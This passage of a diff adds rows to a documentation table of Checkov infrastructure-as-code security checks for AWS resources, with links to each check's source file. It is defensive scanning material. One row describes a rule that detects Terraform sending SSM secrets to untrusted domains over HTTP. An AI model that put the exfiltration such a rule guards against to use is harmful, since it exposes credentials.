+| 804 | CKV_AWS_352 | resource | aws_network_acl_rule | Ensure NACL ingress does not allow all Ports | Terraform | [NetworkACLUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestricted.py) |
+| 805 | CKV_AWS_353 | resource | aws_db_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) |
+| 806 | CKV_AWS_353 | resource | aws_rds_cluster_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) |
+| 807 | CKV_AWS_354 | resource | aws_db_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) |
+| 808 | CKV_AWS_354 | resource | aws_rds_cluster_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) |
+| 809 | CKV_AWS_355 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) |
+| 810 | CKV_AWS_355 | resource | aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) |
+| 811 | CKV_AWS_355 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) |
+| 812 | CKV_AWS_355 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) |
+| 813 | CKV_AWS_355 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) |
+| 814 | CKV_AWS_356 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [ResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/ResourcePolicyDocument.py) |
+| 815 | CKV_AWS_357 | resource | aws_transfer_server | Ensure Transfer Server allows only secure protocols | Terraform | [TransferServerAllowsOnlySecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerAllowsOnlySecureProtocols.py) |
+| 816 | CKV_AWS_358 | data | aws_iam_policy_document | Ensure GitHub Actions OIDC trust policies only allows actions from a specific known organization | Terraform | [GithubActionsOIDCTrustPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py) |
+| 817 | CKV_AWS_359 | resource | aws_neptune_cluster | Neptune DB clusters should have IAM database authentication enabled | Terraform | [NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py) |
+| 818 | CKV_AWS_360 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB has an adequate backup retention period | Cloudformation | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py) |
+| 819 | CKV_AWS_360 | resource | aws_docdb_cluster | Ensure DocumentDB has an adequate backup retention period | Terraform | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBBackupRetention.py) |
+| 820 | CKV_AWS_361 | resource | AWS::Neptune::DBCluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Cloudformation | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py) |
+| 821 | CKV_AWS_361 | resource | aws_neptune_cluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Terraform | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterBackupRetention.py) |
+| 822 | CKV_AWS_362 | resource | aws_neptune_cluster | Neptune DB clusters should be configured to copy tags to snapshots | Terraform | [NeptuneDBClustersCopyTagsToSnapshots.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersCopyTagsToSnapshots.py) |
+| 823 | CKV_AWS_363 | resource | AWS::Lambda::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) |
+| 824 | CKV_AWS_363 | resource | AWS::Serverless::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) |
+| 825 | CKV_AWS_363 | resource | aws_lambda_function | Ensure Lambda Runtime is not deprecated | Terraform | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py) |
+| 826 | CKV_AWS_364 | resource | AWS::Lambda::Permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Cloudformation | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py) |
+| 827 | CKV_AWS_364 | resource | aws_lambda_permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Terraform | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaServicePermission.py) |
+| 828 | CKV_AWS_365 | resource | aws_ses_configuration_set | Ensure SES Configuration Set enforces TLS usage | Terraform | [SesConfigurationSetDefinesTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SesConfigurationSetDefinesTLS.py) |
+| 829 | CKV_AWS_366 | resource | AWS::Cognito::IdentityPool | Ensure AWS Cognito identity pool does not allow unauthenticated guest access | Cloudformation | [CognitoUnauthenticatedIdentities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py) |
+| 830 | CKV_AWS_366 | resource | aws_cognito_identity_pool | Ensure AWS Cognito identity pool does not allow unauthenticated guest access | Terraform | [CognitoUnauthenticatedIdentities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CognitoUnauthenticatedIdentities.py) |
+| 831 | CKV_AWS_367 | resource | AWS::SageMaker::DataQualityJobDefinition | Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt model artifacts | Cloudformation | [SagemakerDataQualityJobDefinitionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionEncryption.py) |
+| 832 | CKV_AWS_367 | resource | aws_sagemaker_data_quality_job_definition | Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt model artifacts | Terraform | [SagemakerDataQualityJobDefinitionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionEncryption.py) |
+| 833 | CKV_AWS_368 | resource | AWS::SageMaker::DataQualityJobDefinition | Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt data on attached storage volume | Cloudformation | [SagemakerDataQualityJobDefinitionVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionVolumeEncryption.py) |
+| 834 | CKV_AWS_368 | resource | aws_sagemaker_data_quality_job_definition | Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt data on attached storage volume | Terraform | [SagemakerDataQualityJobDefinitionVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionVolumeEncryption.py) |
+| 835 | CKV_AWS_369 | resource | AWS::SageMaker::DataQualityJobDefinition | Ensure Amazon Sagemaker Data Quality Job encrypts all communications between instances used for monitoring jobs | Cloudformation | [SagemakerDataQualityJobDefinitionTrafficEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionTrafficEncryption.py) |
+| 836 | CKV_AWS_369 | resource | aws_sagemaker_data_quality_job_definition | Ensure Amazon Sagemaker Data Quality Job encrypts all communications between instances used for monitoring jobs | Terraform | [SagemakerDataQualityJobDefinitionTrafficEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionTrafficEncryption.py) |
+| 837 | CKV_AWS_370 | resource | AWS::SageMaker::Model | Ensure Amazon SageMaker model uses network isolation | Cloudformation | [SagemakerModelWithNetworkIsolation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerModelWithNetworkIsolation.py) |
+| 838 | CKV_AWS_370 | resource | aws_sagemaker_model | Ensure Amazon SageMaker model uses network isolation | Terraform | [SagemakerModelWithNetworkIsolation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerModelWithNetworkIsolation.py) |
+| 839 | CKV_AWS_371 | resource | AWS::SageMaker::NotebookInstance | Ensure Amazon SageMaker Notebook Instance only allows for IMDSv2 | Cloudformation | [SagemakerNotebookInstanceAllowsIMDSv2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookInstanceAllowsIMDSv2.py) |
+| 840 | CKV_AWS_371 | resource | aws_sagemaker_notebook_instance | Ensure Amazon SageMaker Notebook Instance only allows for IMDSv2 | Terraform | [SagemakerNotebookInstanceAllowsIMDSv2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookInstanceAllowsIMDSv2.py) |
+| 841 | CKV_AWS_372 | resource | aws_sagemaker_flow_definition | Ensure Amazon SageMaker Flow Definition uses KMS for output configurations | Terraform | [SagemakerFlowDefinitionUsesKMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerFlowDefinitionUsesKMS.py) |
+| 842 | CKV_AWS_373 | resource | AWS::Bedrock::Agent | Ensure Bedrock Agent is encrypted with a CMK | Cloudformation | [BedrockAgentEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/BedrockAgentEncrypted.py) |
+| 843 | CKV_AWS_373 | resource | aws_bedrockagent_agent | Ensure Bedrock Agent is encrypted with a CMK | Terraform | [BedrockAgentEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BedrockAgentEncrypted.py) |
+| 844 | CKV2_AWS_1 | resource | aws_network_acl | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) |
+| 845 | CKV2_AWS_1 | resource | aws_subnet | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) |
+| 846 | CKV2_AWS_2 | resource | aws_ebs_volume | Ensure that only encrypted EBS volumes are attached to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) |
+| 847 | CKV2_AWS_2 | resource | aws_volume_attachment | Ensure that only encrypted EBS volumes are attached to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) |
+| 848 | CKV2_AWS_3 | resource | aws_guardduty_detector | Ensure GuardDuty is enabled to specific org/region | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) |
+| 849 | CKV2_AWS_3 | resource | aws_guardduty_organization_configuration | Ensure GuardDuty is enabled to specific org/region | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) |
+| 850 | CKV2_AWS_4 | resource | aws_api_gateway_method_settings | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) |
+| 851 | CKV2_AWS_4 | resource | aws_api_gateway_stage | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) |
+| 852 | CKV2_AWS_5 | resource | aws_security_group | Ensure that Security Groups are attached to another resource | Terraform | [SGAttachedToResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SGAttachedToResource.yaml) |
+| 853 | CKV2_AWS_6 | resource | aws_s3_bucket | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) |
+| 854 | CKV2_AWS_6 | resource | aws_s3_bucket_public_access_block | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) |
+| 855 | CKV2_AWS_7 | resource | aws_emr_cluster | Ensure that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) |
+| 856 | CKV2_AWS_7 | resource | aws_security_group | Ensure that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) |
+| 857 | CKV2_AWS_8 | resource | aws_rds_cluster | Ensure that RDS clusters has backup plan of AWS Backup | Terraform | [RDSClusterHasBackupPlan.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSClusterHasBackupPlan.yaml) |
+| 858 | CKV2_AWS_9 | resource | aws_backup_selection | Ensure that EBS are added in the backup plans of AWS Backup | Terraform | [EBSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EBSAddedBackup.yaml) |
+| 859 | CKV2_AWS_10 | resource | aws_cloudtrail | Ensure CloudTrail trails are integrated with CloudWatch Logs | Terraform | [CloudtrailHasCloudwatch.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudtrailHasCloudwatch.yaml) |
+| 860 | CKV2_AWS_11 | resource | aws_vpc | Ensure VPC flow logging is enabled in all VPCs | Terraform | [VPCHasFlowLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasFlowLog.yaml) |
+| 861 | CKV2_AWS_12 | resource | aws_default_security_group | Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) |
+| 862 | CKV2_AWS_12 | resource | aws_vpc | Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) |
+| 863 | CKV2_AWS_14 | resource | aws_iam_group | Ensure that IAM groups includes at least one IAM user | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) |
+| 864 | CKV2_AWS_14 | resource | aws_iam_group_membership | Ensure that IAM groups includes at least one IAM user | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) |
+| 865 | CKV2_AWS_15 | resource | aws_autoscaling_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) |
+| 866 | CKV2_AWS_15 | resource | aws_elb | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) |
+| 867 | CKV2_AWS_15 | resource | aws_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) |
+| 868 | CKV2_AWS_16 | resource | aws_appautoscaling_target | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) |
+| 869 | CKV2_AWS_16 | resource | aws_dynamodb_table | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) |
+| 870 | CKV2_AWS_18 | resource | aws_backup_selection | Ensure that Elastic File System (Amazon EFS) file systems are added in the backup plans of AWS Backup | Terraform | [EFSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EFSAddedBackup.yaml) |
+| 871 | CKV2_AWS_19 | resource | aws_eip | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) |
+| 872 | CKV2_AWS_19 | resource | aws_eip_association | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) |
+| 873 | CKV2_AWS_20 | resource | aws_alb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) |
+| 874 | CKV2_AWS_20 | resource | aws_alb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) |
+| 875 | CKV2_AWS_20 | resource | aws_lb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) |
+| 876 | CKV2_AWS_20 | resource | aws_lb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) |
+| 877 | CKV2_AWS_21 | resource | aws_iam_group_membership | Ensure that all IAM users are members of at least one IAM group. | Terraform | [IAMUsersAreMembersAtLeastOneGroup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUsersAreMembersAtLeastOneGroup.yaml) |
+| 878 | CKV2_AWS_22 | resource | aws_iam_user | Ensure an IAM User does not have access to the console | Terraform | [IAMUserHasNoConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUserHasNoConsoleAccess.yaml) |
+| 879 | CKV2_AWS_23 | resource | aws_route53_record | Route53 A Record has Attached Resource | Terraform | [Route53ARecordAttachedResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ARecordAttachedResource.yaml) |
+| 880 | CKV2_AWS_27 | resource | aws_rds_cluster | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) |
+| 881 | CKV2_AWS_27 | resource | aws_rds_cluster_parameter_group | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) |
+| 882 | CKV2_AWS_28 | resource | aws_alb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) |
+| 883 | CKV2_AWS_28 | resource | aws_lb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) |
+| 884 | CKV2_AWS_29 | resource | aws_api_gateway_rest_api | Ensure public API gateway are protected by WAF | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) |
+| 885 | CKV2_AWS_29 | resource | aws_api_gateway_stage | Ensure public API gateway are protected by WAF | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) |
+| 886 | CKV2_AWS_30 | resource | aws_db_instance | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) |
+| 887 | CKV2_AWS_30 | resource | aws_db_parameter_group | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) |
+| 888 | CKV2_AWS_31 | resource | aws_wafv2_web_acl | Ensure WAF2 
has a Logging Configuration | Terraform | [WAF2HasLogs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/WAF2HasLogs.yaml) | +| 889 | CKV2_AWS_32 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a response headers policy attached | Terraform | [CloudFrontHasResponseHeadersPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasResponseHeadersPolicy.yaml) | +| 890 | CKV2_AWS_33 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync is protected by WAF | Cloudformation | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml) | +| 891 | CKV2_AWS_33 | resource | aws_appsync_graphql_api | Ensure AppSync is protected by WAF | Terraform | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppSyncProtectedByWAF.yaml) | +| 892 | CKV2_AWS_34 | resource | aws_ssm_parameter | AWS SSM Parameter should be Encrypted | Terraform | [AWSSSMParameterShouldBeEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSSSMParameterShouldBeEncrypted.yaml) | +| 893 | CKV2_AWS_35 | resource | aws_route | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) | +| 894 | CKV2_AWS_35 | resource | aws_route_table | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) | +| 895 | CKV2_AWS_36 | resource | aws_ssm_parameter | Ensure terraform is not sending SSM secrets to untrusted 
domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) | +| 896 | CKV2_AWS_36 | resource | data.http | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) | +| 897 | CKV2_AWS_37 | resource | aws | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 898 | CKV2_AWS_37 | resource | aws_accessanalyzer_analyzer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 899 | CKV2_AWS_37 | resource | aws_acm_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 900 | CKV2_AWS_37 | resource | aws_acm_certificate_validation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 901 | CKV2_AWS_37 | resource | aws_acmpca_certificate_authority | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 902 | CKV2_AWS_37 | resource | aws_ami | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 903 | CKV2_AWS_37 | resource | aws_ami_copy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 904 | CKV2_AWS_37 | resource | aws_ami_from_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 905 | CKV2_AWS_37 | resource | aws_ami_launch_permission | Ensure CodeCommit associates an approval rule | Terraform | 